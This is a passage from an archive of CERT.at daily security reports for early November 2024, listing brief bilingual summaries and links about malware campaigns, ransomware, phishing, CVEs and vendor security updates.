have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe. --------------------------------------------- https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html ∗∗∗ #StopRansomware: Black Basta ∗∗∗ --------------------------------------------- Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting. --------------------------------------------- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a ∗∗∗ Cyberattack causes credit card readers to malfunction in Israel ∗∗∗ --------------------------------------------- As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments. --------------------------------------------- https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to… ∗∗∗ Malware Steals Account Credentials ∗∗∗ --------------------------------------------- It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case. --------------------------------------------- https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html ∗∗∗ Known Attacks On Elliptic Curve Cryptography ∗∗∗ --------------------------------------------- In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet. --------------------------------------------- https://github.com/elikaski/ECC_Attacks ∗∗∗ Pishi: Coverage guided macOS KEXT fuzzing ∗∗∗ --------------------------------------------- In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I’ll break down the concepts, provide relatable examples, and resources, My goal is to make fuzzing approachable and interesting. --------------------------------------------- https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html ===================== = Vulnerabilities = ===================== ∗∗∗ Veeam Backup Enterprise Manager: Unbefugte Zugriffe durch Angreifer möglich ∗∗∗ --------------------------------------------- Setzen Angreifer erfolgreich an der Schwachstelle (CVE-2024-40715 "hoch") an, können sie die Authentifizierung umgehen und Verbindungen als Man-in-the-Middle belauschen. Wie das im Detail ablaufen könnte, ist bislang nicht bekannt. [..] Ein Sicherheitspatch steht zum Download bereit. --------------------------------------------- https://www.heise.de/-10018234.html ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu). --------------------------------------------- https://lwn.net/Articles/997774/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.11.2024
by Daily end-of-shift report 08 Nov '24

08 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 07-11-2024 18:00 − Freitag 08-11-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Google To Make MFA Mandatory for Google Cloud in 2025 ∗∗∗ --------------------------------------------- Google has recently announced that it plans to implement mandatory multi-factor authentication (MFA) on all Cloud accounts by the end of 2025. [..] The implementation will affect both admins and users with access to Google Cloud. General consumer Google accounts will not be affected. --------------------------------------------- https://heimdalsecurity.com/blog/google-cloud-mfa/ ∗∗∗ 2024 Credit Card Theft Season Arrives ∗∗∗ --------------------------------------------- In today’s post we’re going to perform a malware analysis of the most common MageCart injections identified so that eCommerce website owners can better understand the risks, and (hopefully) protect themselves, their websites, and their customers from attackers. --------------------------------------------- https://blog.sucuri.net/2024/11/2024-credit-card-theft-season-arrives.html ∗∗∗ ESET APT Activity Report Q2 2024–Q3 2024 ∗∗∗ --------------------------------------------- An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2024 and Q3 2024 --------------------------------------------- https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2… ∗∗∗ Helldown Ransomware Group – A New Emerging Ransomware Threat ∗∗∗ --------------------------------------------- As of November 2024, the online resources available related to the Helldown ransomware group’s Tactics Techniques and Procedures (TTP’s) were effectively none-existent – this blogpost aims to address that and will be updated continuously as more investigations are completed. --------------------------------------------- https://www.truesec.com/hub/blog/helldown-ransomware-group ∗∗∗ TLPT & ME: Everything you need to know about Threat-Led Penetration Testing (TLPT) in a TIBER world. ∗∗∗ --------------------------------------------- While the TLPT RTS does come with some additional requirements or nuances compared to the TIBER framework, we can all be certain that adopting TIBER is indeed the way to fulfill DORA’s TLPT requirements. As mentioned in our initial post, we expect many more European countries to publish a TIBER implementation guide and/or a TIBER-EU 2.0 to be published for additional convergence. --------------------------------------------- https://blog.nviso.eu/2024/11/08/tlpt-me-everything-you-need-to-know-about-… ∗∗∗ Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations ∗∗∗ --------------------------------------------- Discover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as Zingdoor and Snappybee, for its campaigns. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-… ∗∗∗ Defending Your Directory: An Expert Guide to Securing Active Directory Against DCSync Attacks ∗∗∗ --------------------------------------------- Last time we took a dive deep into Kerberoasting. Up next, let's unravel the sinister secrets of DCSync attacks - a stealthy technique that can bring your entire Active Directory to its knees. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ∗∗∗ Nameless and shameless: Ransomware Encryption via BitLocker ∗∗∗ --------------------------------------------- This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs. --------------------------------------------- https://www.nccgroup.com/us/research-blog/nameless-and-shameless-ransomware… ∗∗∗ Unmasking Phishing: Strategies for identifying 0ktapus domains and beyond ∗∗∗ --------------------------------------------- Wiz Research looks at phishing tactics, along with how to trace and investigate these campaigns. --------------------------------------------- https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktap… ===================== = Vulnerabilities = ===================== ∗∗∗ Max-Critical Cisco Bug Enables Command-Injection Attacks ∗∗∗ --------------------------------------------- Though Cisco reports of no known malicious exploitation attempts, but thanks to a CVSS 10 out of 10 security vulnerability (CVE-2024-20418) three of its wireless access points are vulnerable to remote, unauthenticated cyberattacks. --------------------------------------------- https://www.darkreading.com/vulnerabilities-threats/cisco-bug-command-injec… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (edk2), Debian (webkit2gtk), Fedora (thunderbird), Oracle (bzip2, container-tools:ol8, edk2, go-toolset:ol8, libtiff, python-idna, python3.11, and python3.12), Slackware (expat), and SUSE (apache2, govulncheck-vulndb, grub2, java-1_8_0-openjdk, python3, python39, qemu, xorg-x11-server, and xwayland). --------------------------------------------- https://lwn.net/Articles/997480/ ∗∗∗ Delta Electronics DIAScreen ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-312-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.11.2024
by Daily end-of-shift report 07 Nov '24

07 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 06-11-2024 18:00 − Donnerstag 07-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hackers increasingly use Winos4.0 post-exploitation kit in attacks ∗∗∗ --------------------------------------------- Hackers are increasingly targeting Windows users with the malicious Winos4.0 framework, distributed via seemingly benign game-related apps. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-increasingly-use-win… ∗∗∗ A look at the latest post-quantum signature standardization candidates ∗∗∗ --------------------------------------------- NIST has standardized four post-quantum signature schemes so far, and they’re not done yet: there are fourteen new candidates in the running for standardization. In this blog post we take .. --------------------------------------------- https://blog.cloudflare.com/another-look-at-pq-signatures ∗∗∗ The Power of Process in Creating a Successful Security Posture ∗∗∗ --------------------------------------------- Establishing realistic, practitioner-driven processes prevents employee burnout, standardizes experiences, and closes many of the gaps exposed by repeated one-offs. --------------------------------------------- https://www.darkreading.com/cybersecurity-operations/process-in-creating-su… ∗∗∗ Microsoft Windows Server 2025 Upgrade Triggers Licensing Conflicts and Operational Fallout ∗∗∗ --------------------------------------------- A recent Microsoft update has unexpectedly forced several organizations to upgrade from Windows Server 2022 to Windows Server 2025, resulting in unexpected licensing demands and operational setbacks. First reported on November 5, 2024, this incident has affected organizations .. --------------------------------------------- https://heimdalsecurity.com/blog/microsoft-windows-server-2025-upgrade/ ∗∗∗ Steam Account Checker Poisoned with Infostealer ∗∗∗ --------------------------------------------- I found an interesting script targeting Steam users. Steam[1] is a popular digital distribution platform for purchasing, downloading, and playing video games on personal computers. The script is called "steam-account-checker" .. --------------------------------------------- https://isc.sans.edu/forums/diary/Steam+Account+Checker+Poisoned+with+Infos… ∗∗∗ China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait ∗∗∗ --------------------------------------------- The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region."During this attack, the threat .. --------------------------------------------- https://thehackernews.com/2024/11/china-aligned-mirrorface-hackers-target.h… ∗∗∗ North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS ∗∗∗ --------------------------------------------- A threat actor with ties to the Democratic Peoples Republic of Korea (DPRK) has been observed targeting cryptocurrency-related businesses with a multi-stage malware capable of infecting Apple macOS devices.Cybersecurity company SentinelOne, .. --------------------------------------------- https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html ∗∗∗ Office unter Windows 11 24H2 mit installiertem Crowdstrike lahmgelegt ∗∗∗ --------------------------------------------- Wer Crowdstrike-Sicherheitssoftware einsetzt und auf Windows 11 24H2 aktualisiert hat, hatte womöglich mit nicht funktionierenden Apps zu kämpfen. --------------------------------------------- https://www.heise.de/news/Crowdstrike-legte-Office-unter-Windows-11-24H2-la… ∗∗∗ Large eBay malvertising campaign leads to scams ∗∗∗ --------------------------------------------- Consumers are being swamped by Google ads claiming to be eBays customer service. --------------------------------------------- https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-cam… ∗∗∗ Vorsicht vor gefälschten Willhaben-Mails ∗∗∗ --------------------------------------------- Kriminelle geben sich als Willhaben aus und versenden massenhaft gefälschte E-Mails. In den teilweise echt aussehenden E-Mails wird behauptet, dass Sie Ihre Identität bestätigen müssen oder eine Rückerstattung erhalten. Eine andere gefälschte E-Mail enthält im Anhang angeblich eine Rechnung. Wir raten zur Vorsicht! --------------------------------------------- https://www.watchlist-internet.at/news/willhaben-phishing/ ∗∗∗ Silent Skimmer Gets Loud (Again) ∗∗∗ --------------------------------------------- We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of ... --------------------------------------------- https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/ ∗∗∗ Unwrapping the emerging Interlock ransomware attack ∗∗∗ --------------------------------------------- Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game .. --------------------------------------------- https://blog.talosintelligence.com/emerging-interlock-ransomware/ ∗∗∗ Androxgh0st Botnet Integrates Mozi, Expands Attacks on IoT Vulnerabilities ∗∗∗ --------------------------------------------- CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and .. --------------------------------------------- https://hackread.com/androxgh0st-botnet-integrate-mozi-iot-vulnerabilities/ ∗∗∗ Malicious Python Package Typosquats Popular fabric SSH Library, Exfiltrates AWS Credentials ∗∗∗ --------------------------------------------- The Socket Research Team has discovered a malicious Python package, fabrice, that is typosquatting the popular fabric SSH automation library. The threat of malware delivered through typosquatted libraries remains a significant .. --------------------------------------------- https://socket.dev/blog/malicious-python-package-typosquats-fabric-ssh-libr… ===================== = Vulnerabilities = ===================== ∗∗∗ Zahlreiche Schwachstellen in HASOMED Elefant and Elefant Software Updater ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.11.2024
by Daily end-of-shift report 06 Nov '24

06 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 05-11-2024 18:00 − Mittwoch 06-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Germany drafts law to protect researchers who find security flaws ∗∗∗ --------------------------------------------- The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors. --------------------------------------------- https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protec… ∗∗∗ Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems ∗∗∗ --------------------------------------------- SANS recently published its 2024 State of ICS.OT Cybersecurity report, highlighting the skills of cyber professionals working in critical infrastructure, budget estimates, and emerging technologies. The report .. --------------------------------------------- https://www.darkreading.com/ics-ot-security/attackers-breach-network-provid… ∗∗∗ Verbraucherschützer warnen: Smarte Fritteusen lauschen und senden Daten nach China ∗∗∗ --------------------------------------------- Verbraucherschützer haben bei verschiedenen smarten Geräten Datenschutzprobleme aufgedeckt. Ganz vorne mit dabei: Heißluftfritteusen! --------------------------------------------- https://www.golem.de/news/verbraucherschuetzer-warnen-smarte-fritteusen-lau… ∗∗∗ New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency ∗∗∗ --------------------------------------------- Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle. --------------------------------------------- https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/ ∗∗∗ INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime ∗∗∗ --------------------------------------------- INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation.Dubbed Operation Synergia II, the coordinated effort ran from April 1 to .. --------------------------------------------- https://thehackernews.com/2024/11/interpols-operation-synergia-ii.html ∗∗∗ Angreifer nutzen emulierte Linux-Umgebung als Backdoor ∗∗∗ --------------------------------------------- IT-Sicherheitsforscher haben eine ungewöhnliche Angriffsart entdeckt: Die Täter haben eine emulierte Linux-Umgebung als Backdoor eingerichtet. --------------------------------------------- https://www.heise.de/news/CRON-TRAP-Emulierte-Linux-Umgebung-als-Backdoor-n… ∗∗∗ Canadian Man Arrested in Snowflake Data Extortions ∗∗∗ --------------------------------------------- A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first .. --------------------------------------------- https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data… ∗∗∗ You lost your iPhone, but it’s locked. That’s fine, right? ∗∗∗ --------------------------------------------- TL;DR Default iOS configuration leaves your locked device vulnerable Ensure your emergency contacts are set. Use ‘FindMy’ to track / wipe lost devices. Take regular backups. Consider turning off the .. --------------------------------------------- https://www.pentestpartners.com/security-blog/you-lost-your-iphone-but-its-… ∗∗∗ Tückische Zahlungsanweisung: Stammt diese Mail wirklich von Ihrem Chef? ∗∗∗ --------------------------------------------- Von der Buchhaltung im internationalen Großkonzern bis zur Verwaltung im Kleinbetrieb nebenan. In letzter Zeit erhalten immer mehr Mitarbeiter:innen betrügerische Mails im Namen der Geschäftsführung .. --------------------------------------------- https://www.watchlist-internet.at/news/tueckische-zahlungsanweisung-chef/ ∗∗∗ Guidance for brands to help advertising partners counter malvertising ∗∗∗ --------------------------------------------- Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud. --------------------------------------------- https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-count… ∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗ --------------------------------------------- The popular NPM package @lottiefiles/lottie-player enables developers to seamlessly integrate Lottie animations into websites and applications. On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to .. --------------------------------------------- https://checkmarx.com/uncategorized/with-2fa-enabled-npm-package-lottie-pla… ∗∗∗ CopyRh(ight)adamantys Campaign: Rhadamantys Exploits Intellectual Property Infringement Baits ∗∗∗ --------------------------------------------- While we finalized this blog post, a technical analysis of this activity was published by fellow researchers from Cisco Talos. While it overlaps with our findings to some extent, our report provides additional extended information about the activity. Introduction Since July 2024, Check Point Research (CPR) has been tracking an extensive a.. --------------------------------------------- https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-late… ∗∗∗ (In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments ∗∗∗ --------------------------------------------- The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-per… ∗∗∗ Threat Campaign Spreads Winos4.0 Through Game Application ∗∗∗ --------------------------------------------- FortiGuard Labs reveals a threat actor spreads Winos4.0, infiltrating gaming apps and targeting the education sector --------------------------------------------- https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos… ∗∗∗ Defending Your Directory: An Expert Guide to Combating Kerberoasting in Active Directory ∗∗∗ --------------------------------------------- 16 hours or less, that’s all it takes for attackers to gain access to Microsoft Active Directory (AD) and unleash mayhem on your organization. If that attack happens on a Friday afternoon, they have all weekend to wreak havoc, escalating their privileges, deploying ransomware, exploiting your VPN, or exfiltrating your data. .. --------------------------------------------- https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit .. --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an authenticated, remote attacker with low privileges to conduct a stored .. --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (libtiff), Debian (context, libheif, and thunderbird), Fedora (php-tcpdf, syncthing, and thunderbird), Gentoo (EditorConfig core C library, Flatpak, Neat VNC, and Ubiquiti UniFi), Oracle (bcc, bpftrace, grafana-pcp, haproxy, kernel, krb5, libtiff, python-gevent, python3.11-urllib3, python3.12-urllib3, and xmlrpc-c), .. --------------------------------------------- https://lwn.net/Articles/997182/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.11.2024
by Daily end-of-shift report 05 Nov '24

05 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Montag 04-11-2024 18:00 − Dienstag 05-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Windows Server 2025 released—here are the new features ∗∗∗ --------------------------------------------- Microsoft has announced that Windows Server 2025, the latest version of its server operating system, is generally available starting Friday, November 1st. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/windows-server-2025-release… ∗∗∗ Nokia investigates breach after hacker claims to steal source code ∗∗∗ --------------------------------------------- Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the companys stolen source code. --------------------------------------------- https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-af… ∗∗∗ Google fixes two Android zero-days used in targeted attacks ∗∗∗ --------------------------------------------- Google fixed two actively exploited Android zero-day flaws as part of its November security updates, addressing a total of 51 vulnerabilities. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zer… ∗∗∗ Angriff auf Schneider Electric: Hungrige Hacker fordern Baguettes als Lösegeld ∗∗∗ --------------------------------------------- Die Angreifer behaupten, über 40 GBytes an Daten von Schneider Electric erbeutet zu haben. Ihre Forderung: 125.000 US-Dollar in Form von Baguettes. --------------------------------------------- https://www.golem.de/news/angriff-auf-schneider-electric-hungrige-hacker-fo… ∗∗∗ Olympia-Kassensysteme: Registrierkassen seit drei Jahren ohne Sicherheitsupdates ∗∗∗ --------------------------------------------- Registrierkassen der Marke Olympia laufen auf Android 11 und bergen Risiken für den Zahlungsverkehr. --------------------------------------------- https://www.golem.de/news/olympia-kassensysteme-registrierkassen-seit-drei-… ∗∗∗ Python RAT with a Nice Screensharing Feature ∗∗∗ --------------------------------------------- While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago. The script I found is based on the same tool and still .. --------------------------------------------- https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/314… ∗∗∗ Maritime lawyers assemble! ∗∗∗ --------------------------------------------- Maritime cyber insurance has been playing catch-up with maritime cyber security for a while now. It was all pretty good until the availability of cheap VSAT meant that ships .. --------------------------------------------- https://www.pentestpartners.com/security-blog/maritime-lawyers-assemble/ ∗∗∗ In final check-in before Election Day, CISA cites low-level threats, and not much else ∗∗∗ --------------------------------------------- Incidents to date have included “low level” distributed denial-of-service activity, criminal destruction of ballot drop boxes and continued threats targeting election officials, CISA Director Jen Easterly .. --------------------------------------------- https://therecord.media/cisa-2024-presidential-election-threats ∗∗∗ Smart Cities gegen Cyberattacken resilient machen ∗∗∗ --------------------------------------------- Ob es uns gefällt oder nicht – Städte weltweit wandeln sich in sogenannte "Smart Cities". Die Protagonisten versprechen Innovation, Nachhaltigkeit und digitales Wachstum. Aber diese Infrastruktur bzw. die .. --------------------------------------------- https://www.borncity.com/blog/2024/11/05/smart-cities-gegen-cyberattacken-r… ∗∗∗ SOC Around the Clock: World Tour Survey Findings ∗∗∗ --------------------------------------------- Trend surveyed 750 cybersecurity professionals in 49 countries to learn more about the state of .. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/k/world-tour-survey-results.ht… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, openexr, and thunderbird), Fedora (llama-cpp and python-quart), Oracle (firefox, openexr, thunderbird, and xorg-x11-server and xorg-x11-server-Xwayland), SUSE (chromium, govulncheck-vulndb, openssl-1_1, python311, and python312), and Ubuntu (linux-azure, linux-bluefield, linux-azure, linux-gcp, linux-ibm, openjpeg2, and ruby3.0, ruby3.2, ruby3.3). --------------------------------------------- https://lwn.net/Articles/997030/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.11.2024
by Daily end-of-shift report 04 Nov '24

04 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 31-10-2024 18:00 − Montag 04-11-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Thousands of hacked TP-Link routers used in years-long account takeover attacks ∗∗∗ --------------------------------------------- The botnet is being skillfully used to launch "highly evasive" password-spraying attacks. --------------------------------------------- https://arstechnica.com/information-technology/2024/11/microsoft-warns-of-8… ∗∗∗ DDoS site Dstat.cc seized and two suspects arrested in Germany ∗∗∗ --------------------------------------------- The Dstat.cc DDoS review platform has been seized by law enforcement, and two suspects have been arrested after the service helped fuel distributed denial-of-service attacks for years. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ddos-site-dstatcc-seized-and… ∗∗∗ Cisco says DevHub site leak won’t enable future breaches ∗∗∗ --------------------------------------------- Cisco says that non-public files recently downloaded by a threat actor from a misconfigured public-facing DevHub portal dont contain information that could be exploited in future breaches of the companys systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cisco-says-devhub-site-leak-… ∗∗∗ Ware nicht geliefert: Betrüger hacken Tausende Webshops und kassieren Millionen ∗∗∗ --------------------------------------------- Hacker haben seit 2019 im Rahmen einer Betrugskampagne unzählige Onlineshops infiltriert. Käufer bestimmter Produkte erhielten .. --------------------------------------------- https://www.golem.de/news/ware-nicht-geliefert-betrueger-hacken-tausende-we… ∗∗∗ From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code ∗∗∗ --------------------------------------------- In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.ht… ∗∗∗ Inside Iran’s Cyber Playbook: AI, Fake Hosting, and Psychological Warfare ∗∗∗ --------------------------------------------- U.S. and Israeli cybersecurity agencies have published a new advisory attributing an Iranian cyber group to targeting the 2024 Summer Olympics and compromising a French commercial dynamic display provider to show messages denouncing Israels participation .. --------------------------------------------- https://thehackernews.com/2024/11/inside-irans-cyber-playbook-ai-fake.html ∗∗∗ Financial institutions told to get their house in order before the next CrowdStrike strikes ∗∗∗ --------------------------------------------- Calls for improvements will soon turn into demands when new rules come into force The UKs finance regulator is urging all institutions under its remit to better prepare for IT meltdowns like .. --------------------------------------------- https://www.theregister.com/2024/11/02/fca_it_resilience/ ∗∗∗ Booking.com Phishers May Leave You With Reservations ∗∗∗ --------------------------------------------- A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. Well .. --------------------------------------------- https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with… ∗∗∗ Kostenlose Webinare zum Schutz im Internet ∗∗∗ --------------------------------------------- Ab 2. Dezember finden in Kooperation mit der AK Oberösterreich und Saferinternet.at spannende Webinare zum sicheren und verantwortungsvollen Umgang mit Handy und Internet statt. Erweitern Sie Ihre digitalen Kompetenzen und .. --------------------------------------------- https://www.watchlist-internet.at/news/kostenlose-webinare-zum-schutz-im-in… ∗∗∗ TA Phone Home: EDR Evasion Testing Reveals Extortion Actors Toolkit ∗∗∗ --------------------------------------------- A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor. --------------------------------------------- https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/ ∗∗∗ FBI wants more info on hackers behind Sophos exploitation after report on China’s intrusions ∗∗∗ --------------------------------------------- The FBI is asking the public for help in tracking down the people behind a series of intrusions into edge devices and networks. --------------------------------------------- https://therecord.media/fbi-hackers-china-wants-info ∗∗∗ Kimsuky Group’s Malware Disguised as Lecture Request Form (MSC, HWP) ∗∗∗ --------------------------------------------- Recently, malware disguised as a lecture request form targeting specific users was identified. The distributed files include Hangul Word Processor (HWP) documents and files in MSC format, which download additional malicious files. Decoy document files used to disguise as legitimate documents have been found to sometimes contain .. --------------------------------------------- https://asec.ahnlab.com/en/84181/ ∗∗∗ Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware ∗∗∗ --------------------------------------------- age “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining .. --------------------------------------------- https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contrac… ∗∗∗ Hackers Claim Access to Nokia Internal Data, Selling for $20,000 ∗∗∗ --------------------------------------------- Hackers claim to have breached Nokia through a third-party contractor, allegedly stealing SSH keys, source code, and internal --------------------------------------------- https://hackread.com/hackers-claim-access-nokia-internal-data-selling-20k/ ∗∗∗ Mallox Ransomware ∗∗∗ --------------------------------------------- FortiGuard Labs continue to see increase in Mallox ransomware related activities detecting Mallox ransomware on multiple hundred FortiGuard sensors. Ransomware infection may cause disruption, damage to daily operations, .. --------------------------------------------- https://fortiguard.fortinet.com/outbreak-alert/mallox-ransomware ∗∗∗ Missing Link: Wie ein Unternehmen bei einem Cyberangriff die Kontrolle verlor ∗∗∗ --------------------------------------------- Eigentlich fühlt sich der IT-Chef recht sicher. Bis Hacker mitten am Tag in die Firma marschieren – und unbehelligt wieder raus. Die Beute: volle Kontrolle. --------------------------------------------- https://heise.de/-9984869 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, grafana, kernel, and mod_http2), Debian (chromium, openssl, and thunderbird), Fedora (chromium, krb5, mysql8.0, 